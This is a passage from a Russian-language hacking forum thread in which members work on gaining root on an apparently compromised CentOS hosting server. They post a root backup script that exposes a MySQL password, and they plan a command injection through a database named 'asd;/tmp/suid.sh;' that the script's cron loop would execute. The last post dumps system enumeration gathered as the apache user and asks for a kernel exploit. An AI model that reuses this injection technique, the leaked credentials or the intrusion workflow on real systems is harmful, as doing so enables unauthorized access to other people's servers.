|
|
|||
|
|||||||
 |
|
|
Опции темы | Поиск в этой теме | Опции просмотра |
30.07.2013, 21:56
|
#911 |
|
Kamnupre
ls -lia /usr/local/bin/; cat /usr/local/bin/backup.sh |
|
|
|
30.07.2013, 22:13
|
#912 | |
|
Цитата:
Код:
total 12
11125621 drwxr-xr-x 2 root root 4096 Jun 26 2012 .
11125619 drwxr-xr-x 12 root root 4096 Apr 20 2012 ..
11130001 -rwxr-xr-x 1 root root 1356 Jun 26 2012 backup.sh
#!/bin/bash
dir=`hostname`
host='HIDE'
rdiff='/usr/bin/rdiff-backup --remote-tempdir tmp --exclude-special-files --ssh-no-compression --no-compression'
keep=14B
rdiff_remove="/usr/bin/ssh $host /usr/bin/rdiff-backup --verbosity 2 --force --remove-older-than $keep"
vhosts_dir='/var/www/vhosts'
remote_config="$dir/config"
remote_vhosts="$dir/vhosts"
#grant all on *.* to mysql_backup@localhost identified by 'dfK286';
DB_ACCESS="-u mysql_backup -pdfK286"
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
BASES_PATH=/var/backup/db
remote_bases="$dir/db"
mysqldump="/usr/bin/mysqldump --force --quick --default-character-set=utf8 $DB_ACCESS"
ssh -o StrictHostKeyChecking=no $host mkdir -p $dir
ssh $host mkdir -p $remote_config
$rdiff --include-globbing-filelist-stdin --exclude '*' / $host::$remote_config <<EOF
/etc/*
/var/spool/cron/*
/var/log/rpmpkgs
/usr/local/bin/backup.sh
/var/named/chroot/etc
/var/named/chroot/var/named
EOF
$rdiff_remove $remote_config
ssh $host mkdir -p $remote_vhosts
for a in `ls -1 $vhosts_dir`;do
$rdiff $vhosts_dir/$a $host::$remote_vhosts/$a
$rdiff_remove $remote_vhosts/$a
done
mkdir -p $BASES_PATH
for base in $BASES; do
$mysqldump $base > $BASES_PATH/$base.sql
done
$rdiff $BASES_PATH $host::$remote_bases
$rdiff_remove $remote_bases
|
|
|
|
|
|
31.07.2013, 11:36
|
#913 |
|
Kamnupre
Пароль к mysql есть. Теперь: Код:
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
...
for base in $BASES; do
$mysqldump $base > $BASES_PATH/$base.sql
Если сработает, и mysql позволит указать такие спец-символы в названии БД, то потом не забудь удалить $BASES_PATH/$base.sql PS Вместо ";" можно попробовать \r, \n и т.п. Последний раз редактировалось SynQ; 31.07.2013 в 11:38.. |
|
|
|
|
|
31.07.2013, 14:12
|
#914 |
|
|
SynQ +1
Код:
mysql -u mysql_backup -pdfK286 Код:
mysql> create database `asd;/tmp/suid.sh;`; Query OK, 1 row affected (0.00 sec) mysql> show databases; +----------------------+ | Database | +----------------------+ | information_schema | | asd;/tmp/suid.sh; | ... Последний раз редактировалось chupakabra; 31.07.2013 в 14:16.. |
|
|
|
|
31.07.2013, 15:17
|
#915 |
|
|
Ввожу mysql -u mysql_backup -p dfK286
Терминал зависает. |
|
|
|
|
31.07.2013, 15:25
|
#916 | |
|
Так попробуй
Цитата:
|
|
|
|
|
|
03.08.2013, 11:14
|
#917 |
|
Вроде в ютубе есть видео по рутанью данного ядра, но в паблике сплойта не видел. Может, есть у кого?
Код:
**************************************************
* general information *
* *
**************************************************
[+]id:
uid=48(apache) gid=48(apache) groups=48(apache)
[+]uanme -a:
Linux web.hoster.ru 2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux
[+]cat /proc/version:
Linux version 2.6.18-194.32.1.el5PAE (admin@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Jan 5 18:43:13 EST 2011
[+]cat /proc/cpuinfo:
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
apicid : 0
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3192.08
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 1
cpu cores : 4
apicid : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.86
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 2
cpu cores : 4
apicid : 2
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.93
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 3
cpu cores : 4
apicid : 3
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.89
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 0
cpu cores : 4
apicid : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.91
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 1
cpu cores : 4
apicid : 5
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.90
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 2
cpu cores : 4
apicid : 6
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.92
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 15
model name : Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
stepping : 7
cpu MHz : 1596.043
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 3
cpu cores : 4
apicid : 7
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips : 3191.91
[+]cat /etc/issue:
Hoster (\n)
CentOS release 5.9 (Final)
Kernel \r on an \m
[+]cat /etc/issue.net:
CentOS release 5.9 (Final)
Kernel \r on an \m
Redhat Release: CentOS release 5.9 (Final)
[+]who online (w):
10:30:09 up 855 days, 17:17, 0 users, load average: 3.53, 2.81, 2.40
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+]proccess list wide tree (ps axfuw):
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2176 608 ? Ss 2011 3:38 init [3]
root 2 0.0 0.0 0 0 ? S< 2011 0:33 [migration/0]
root 3 0.0 0.0 0 0 ? SN 2011 2:54 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/0]
root 5 0.0 0.0 0 0 ? S< 2011 0:40 [migration/1]
root 6 0.0 0.0 0 0 ? SN 2011 0:05 [ksoftirqd/1]
root 7 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/1]
root 8 0.0 0.0 0 0 ? S< 2011 0:27 [migration/2]
root 9 0.0 0.0 0 0 ? SN 2011 0:03 [ksoftirqd/2]
root 10 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/2]
root 11 0.0 0.0 0 0 ? S< 2011 0:29 [migration/3]
root 12 0.0 0.0 0 0 ? SN 2011 0:03 [ksoftirqd/3]
root 13 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/3]
root 14 0.0 0.0 0 0 ? S< 2011 0:20 [migration/4]
root 15 0.0 0.0 0 0 ? SN 2011 0:04 [ksoftirqd/4]
root 16 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/4]
root 17 0.0 0.0 0 0 ? S< 2011 0:50 [migration/5]
root 18 0.0 0.0 0 0 ? SN 2011 0:04 [ksoftirqd/5]
root 19 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/5]
root 20 0.0 0.0 0 0 ? S< 2011 0:18 [migration/6]
root 21 0.0 0.0 0 0 ? SN 2011 0:05 [ksoftirqd/6]
root 22 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/6]
root 23 0.0 0.0 0 0 ? S< 2011 0:46 [migration/7]
root 24 0.0 0.0 0 0 ? SN 2011 0:04 [ksoftirqd/7]
root 25 0.0 0.0 0 0 ? S< 2011 0:00 [watchdog/7]
root 26 0.0 0.0 0 0 ? S< 2011 0:00 [events/0]
root 27 0.0 0.0 0 0 ? S< 2011 0:00 [events/1]
root 28 0.0 0.0 0 0 ? S< 2011 0:00 [events/2]
root 29 0.0 0.0 0 0 ? S< 2011 0:00 [events/3]
root 30 0.0 0.0 0 0 ? S< 2011 0:00 [events/4]
root 31 0.0 0.0 0 0 ? S< 2011 0:00 [events/5]
root 32 0.0 0.0 0 0 ? S< 2011 0:00 [events/6]
root 33 0.0 0.0 0 0 ? S< 2011 0:00 [events/7]
root 34 0.0 0.0 0 0 ? S< 2011 4:18 [khelper]
root 35 0.0 0.0 0 0 ? S< 2011 0:00 [kthread]
root 45 0.0 0.0 0 0 ? S< 2011 0:02 \_ [kblockd/0]
root 46 0.0 0.0 0 0 ? S< 2011 0:02 \_ [kblockd/1]
root 47 0.0 0.0 0 0 ? S< 2011 2:11 \_ [kblockd/2]
root 48 0.0 0.0 0 0 ? S< 2011 1:43 \_ [kblockd/3]
root 49 0.0 0.0 0 0 ? S< 2011 0:04 \_ [kblockd/4]
root 50 0.0 0.0 0 0 ? S< 2011 0:06 \_ [kblockd/5]
root 51 0.0 0.0 0 0 ? S< 2011 0:02 \_ [kblockd/6]
root 52 0.0 0.0 0 0 ? S< 2011 0:02 \_ [kblockd/7]
root 53 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kacpid]
root 177 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/0]
root 178 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/1]
root 179 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/2]
root 180 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/3]
root 181 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/4]
root 182 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/5]
root 183 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/6]
root 184 0.0 0.0 0 0 ? S< 2011 0:00 \_ [cqueue/7]
root 187 0.0 0.0 0 0 ? S< 2011 0:00 \_ [khubd]
root 189 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kseriod]
root 280 0.0 0.0 0 0 ? S 2011 0:00 \_ [khungtaskd]
root 283 0.0 0.0 0 0 ? S< 2011 106:11 \_ [kswapd0]
root 284 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/0]
root 285 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/1]
root 286 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/2]
root 287 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/3]
root 288 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/4]
root 289 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/5]
root 290 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/6]
root 291 0.0 0.0 0 0 ? S< 2011 0:00 \_ [aio/7]
root 457 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kpsmoused]
root 542 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/0]
root 543 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/1]
root 544 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/2]
root 545 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/3]
root 546 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/4]
root 547 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/5]
root 548 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/6]
root 549 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata/7]
root 550 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ata_aux]
root 560 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_0]
root 561 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_1]
root 562 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_2]
root 563 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_3]
root 564 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_4]
root 565 0.0 0.0 0 0 ? S< 2011 0:00 \_ [scsi_eh_5]
root 575 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kstriped]
root 612 0.0 0.0 0 0 ? S< 2011 0:00 \_ [ksnapd]
root 651 0.0 0.0 0 0 ? D< 2011 802:34 \_ [md1_raid1]
root 655 0.0 0.0 0 0 ? S< 2011 1:10 \_ [md0_raid1]
root 658 0.0 0.0 0 0 ? S< 2011 845:40 \_ [kjournald]
root 678 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kauditd]
root 1274 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kedac]
root 1910 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/0]
root 1911 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/1]
root 1912 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/2]
root 1913 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/3]
root 1914 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/4]
root 1915 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/5]
root 1916 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/6]
root 1917 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpathd/7]
root 1918 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kmpath_handlerd]
root 1940 0.0 0.0 0 0 ? S< 2011 0:00 \_ [kjournald]
root 2427 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/0]
root 2428 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/1]
root 2429 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/2]
root 2430 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/3]
root 2431 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/4]
root 2432 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/5]
root 2433 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/6]
root 2434 0.0 0.0 0 0 ? S< 2011 0:00 \_ [rpciod/7]
root 6329 0.0 0.0 0 0 ? S< 2011 0:00 \_ [nfsd4]
root 30130 0.1 0.0 0 0 ? SN Jan29 381:21 \_ [kipmi0]
root 25213 0.0 0.0 0 0 ? S Jul30 1:09 \_ [pdflush]
root 25974 0.0 0.0 0 0 ? S Jul30 0:33 \_ [pdflush]
root 2298 0.0 0.0 1816 556 ? Ss 2011 71:52 syslogd -m 0
root 2301 0.0 0.0 1764 380 ? Ss 2011 0:00 klogd -x
root 2310 0.0 0.0 2560 332 ? Ss 2011 7:44 irqbalance
nobody 2880 0.0 0.3 92668 39464 ? Ssl 2011 102:01 memcached -d -p 11211 -u nobody -m 256 -c 1024 -P /var/run/memcached/memcached.pid -l 127.0.0.1
root 3098 0.0 0.0 3612 352 ? S 2011 0:04 /usr/sbin/smartd -q never
root 3101 0.0 0.0 1764 420 ttyS1 Ss+ 2011 0:00 /sbin/agetty -L ttyS1 19200 vt100
rpc 8386 0.0 0.0 2016 760 ? Ss 2011 0:03 portmap
clamav 8521 0.0 0.0 218704 1728 ? Ss 2011 29:24 /usr/sbin/clamsmtpd -f /etc/clamsmtpd.conf -p /var/run/clamav/clamsmtpd.pid
root 8731 0.0 0.0 2360 444 ? Ss 2011 0:00 /usr/sbin/atd
root 6251 0.0 0.0 5932 704 ? Ss 2011 0:00 rpc.idmapd
root 6325 0.0 0.0 4040 244 ? Ss 2011 0:00 rpc.rquotad
root 6328 0.0 0.0 0 0 ? S 2011 0:00 [lockd]
root 6330 0.0 0.0 0 0 ? S 2011 0:00 [nfsd]
root 6331 0.0 0.0 0 0 ? S 2011 0:00 [nfsd]
root 6332 0.0 0.0 0 0 ? S 2011 0:01 [nfsd]
root 6333 0.0 0.0 0 0 ? S 2011 0:01 [nfsd]
root 6334 0.0 0.0 0 0 ? S 2011 0:00 [nfsd]
root 6335 0.0 0.0 0 0 ? S 2011 0:01 [nfsd]
root 6336 0.0 0.0 0 0 ? S 2011 0:01 [nfsd]
root 6337 0.0 0.0 0 0 ? S 2011 0:00 [nfsd]
root 6340 0.0 0.0 2024 716 ? Ss 2011 0:07 rpc.mountd
root 7510 0.0 0.0 1748 472 tty1 Ss+ 2011 0:00 /sbin/mingetty tty1
root 7512 0.0 0.0 1748 472 tty4 Ss+ 2011 0:00 /sbin/mingetty tty4
root 7514 0.0 0.0 1748 468 tty5 Ss+ 2011 0:00 /sbin/mingetty tty5
root 7516 0.0 0.0 1748 464 tty6 Ss+ 2011 0:00 /sbin/mingetty tty6
root 7518 0.0 0.0 1748 468 tty2 Ss+ 2011 0:00 /sbin/mingetty tty2
root 7520 0.0 0.0 1748 468 tty3 Ss+ 2011 0:00 /sbin/mingetty tty3
ntp 20035 0.0 0.0 4512 4508 ? SLs 2011 1:27 ntpd -u ntp:ntp -p /var/run/ntpd.pid
root 11854 0.0 0.0 5380 1116 ? Ss 2012 0:22 crond
root 12212 0.0 0.0 1764 528 ? Ss 2012 0:00 /usr/sbin/acpid
root 16727 0.0 0.0 5308 544 ? Ss 2012 0:45 vsftpd: LISTENER
zabbix 31935 0.0 0.0 6772 784 ? S 2012 0:00 /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31936 0.0 0.0 6772 1268 ? S 2012 0:39 \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31937 0.0 0.0 6852 1212 ? S 2012 195:46 \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31938 0.0 0.0 6852 1212 ? S 2012 196:39 \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31940 0.0 0.0 6852 1212 ? S 2012 196:48 \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31941 0.0 0.0 6848 932 ? S 2012 1:04 \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix 31968 0.0 0.0 46760 1780 ? S 2012 0:00 zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31970 0.0 0.0 46760 1780 ? S 2012 43:41 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31971 0.0 0.0 46760 1248 ? S 2012 0:02 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31972 0.0 0.2 49604 27808 ? S 2012 36:16 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31973 0.0 0.2 49604 27808 ? S 2012 36:17 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31974 0.0 0.2 49604 27952 ? S 2012 36:14 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31975 0.0 0.2 49604 27812 ? S 2012 36:26 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31976 0.0 0.2 49604 27812 ? S 2012 36:15 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31977 0.0 0.0 49520 11680 ? S 2012 0:31 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31978 0.0 0.2 47180 26348 ? S 2012 2:06 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31979 0.0 0.2 47180 26348 ? S 2012 2:06 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31980 0.0 0.2 47180 26344 ? S 2012 2:09 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31981 0.0 0.2 47180 26348 ? S 2012 2:06 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31982 0.0 0.2 47180 26348 ? S 2012 2:07 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31985 0.0 0.0 47392 9628 ? S 2012 2:43 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31986 0.0 0.0 46768 1660 ? S 2012 0:13 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31988 0.0 0.0 46760 1280 ? S 2012 41:56 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31990 0.0 0.0 46760 1260 ? S 2012 1:57 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31992 0.0 0.0 46896 10880 ? S 2012 98:12 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31994 0.0 0.0 49204 2504 ? S 2012 0:02 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31996 0.0 0.2 46892 26452 ? S 2012 37:09 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 31997 0.0 0.2 46888 26424 ? S 2012 37:05 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 32000 0.0 0.2 46888 26444 ? S 2012 37:02 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 32001 0.0 0.2 46892 26440 ? S 2012 37:02 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 32003 0.0 0.0 46824 1548 ? S 2012 0:13 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 32005 0.0 0.0 46760 1196 ? S 2012 0:00 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix 32007 0.0 0.0 46760 1004 ? S 2012 0:00 \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
600 11494 0.0 0.0 5548 1240 ? Ss 2012 0:00 SCREEN
600 11495 0.0 0.0 4892 1428 pts/1 Ss 2012 0:00 \_ /bin/bash
600 11517 0.0 0.0 7932 2716 pts/1 S+ 2012 0:00 \_ /usr/bin/mc -P /tmp/mc-webmaster/mc.pwd.11495
600 11519 0.0 0.0 4892 1440 pts/2 Ss+ 2012 0:00 \_ bash -rcfile .bashrc
600 11592 0.0 0.0 6188 1316 ? Ss 2012 0:00 SCREEN
600 11593 0.0 0.0 5648 1468 pts/3 Ss 2012 0:00 \_ /bin/bash
600 11617 0.0 0.0 10140 5224 pts/3 S+ 2012 0:02 \_ /usr/bin/mc -P /tmp/mc-webmaster/mc.pwd.11593
600 11619 0.0 0.0 4892 1440 pts/4 Ss+ 2012 0:00 \_ bash -rcfile .bashrc
named 4601 1.0 0.1 125000 16424 ? Ssl Jan08 2993:08 /usr/sbin/named -u named -t /var/named/chroot
root 28844 0.0 0.0 2280 692 ? S<s Jan29 0:00 /sbin/udevd -d
root 29912 0.0 0.0 2852 916 ? Ss Jan29 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root 19030 7.4 0.3 57116 49740 ? DNs 07:24 13:47 \_ /usr/bin/rsync --daemon
rpcuser 29990 0.0 0.0 1980 748 ? Ss Jan29 0:00 rpc.statd
root 30201 0.0 0.0 1992 496 ? Ss Jan29 0:02 mdadm --monitor --scan -f --pid-file=/var/run/mdadm/mdadm.pid
root 30344 0.0 0.0 4648 1292 ? S Jan29 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/usr --user=mysql
mysql 30423 4.6 1.0 239100 129024 ? Sl Jan29 12362:02 \_ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --log-error=/var/log/mysqld.log --socket=/var/lib/mysql/mysql.sock
root 23205 0.0 0.0 8716 2056 ? Ss Feb15 39:25 /usr/libexec/postfix/master
postfix 23208 0.0 0.0 8952 2256 ? S Feb15 3:18 \_ qmgr -l -t fifo -u
postfix 23221 0.0 0.0 8828 2196 ? S Feb15 1:05 \_ tlsmgr -l -t unix -u
postfix 23222 0.0 0.0 8832 2160 ? S Feb15 4:54 \_ anvil -l -t unix -u
postfix 28582 0.0 0.0 8800 2060 ? S 09:25 0:00 \_ pickup -l -t fifo -u -o content_filter
postfix 30773 0.0 0.0 8912 2500 ? S 09:53 0:00 \_ proxymap -t unix -u
postfix 30862 0.0 0.0 8808 2396 ? S 09:55 0:00 \_ trivial-rewrite -n rewrite -t unix -u
postfix 32109 0.0 0.0 9996 4296 ? S 10:10 0:00 \_ smtpd -n smtp -t inet -u -s 3
postfix 32497 0.0 0.0 9996 4296 ? S 10:15 0:00 \_ smtpd -n smtp -t inet -u -s 3
postfix 993 0.0 0.0 9996 4292 ? S 10:26 0:00 \_ smtpd -n smtp -t inet -u -s 3
postfix 1996 1.1 0.0 9996 4256 ? S 10:30 0:00 \_ smtpd -n smtp -t inet -u -s 3
postfix 1997 0.0 0.0 8924 2240 ? S 10:30 0:00 \_ cleanup -z -t unix -u
postfix 1998 0.0 0.0 8924 2276 ? S 10:30 0:00 \_ cleanup -z -t unix -u
postfix 1999 0.0 0.0 8964 2204 ? S 10:30 0:00 \_ smtp -n scan -t unix -u -o smtp_send_xforward_command yes -o smtp_tls_security_level none
postfix 2000 0.0 0.0 8964 2204 ? S 10:30 0:00 \_ smtp -n scan -t unix -u -o smtp_send_xforward_command yes -o smtp_tls_security_level none
postfix 2002 1.0 0.0 9968 3988 ? S 10:30 0:00 \_ smtpd -n 127.0.0.1:10026 -t inet -u -o content_filter spam:dummy -o receive_override_options no_unknown_recipient_checks,no_header_body_checks -o smtpd_client_restrictions -o smtpd_helo_restrictions -o smtpd_sender_restrictions -o smtpd_recipient_restrictions permit_mynetworks,reject -o mynetworks 127.0.0.0/8 -o smtpd_authorized_xforward_hosts 127.0.0.0/8
postfix 2004 1.0 0.0 9968 3988 ? S 10:30 0:00 \_ smtpd -n 127.0.0.1:10026 -t inet -u -o content_filter spam:dummy -o receive_override_options no_unknown_recipient_checks,no_header_body_checks -o smtpd_client_restrictions -o smtpd_helo_restrictions -o smtpd_sender_restrictions -o smtpd_recipient_restrictions permit_mynetworks,reject -o mynetworks 127.0.0.0/8 -o smtpd_authorized_xforward_hosts 127.0.0.0/8
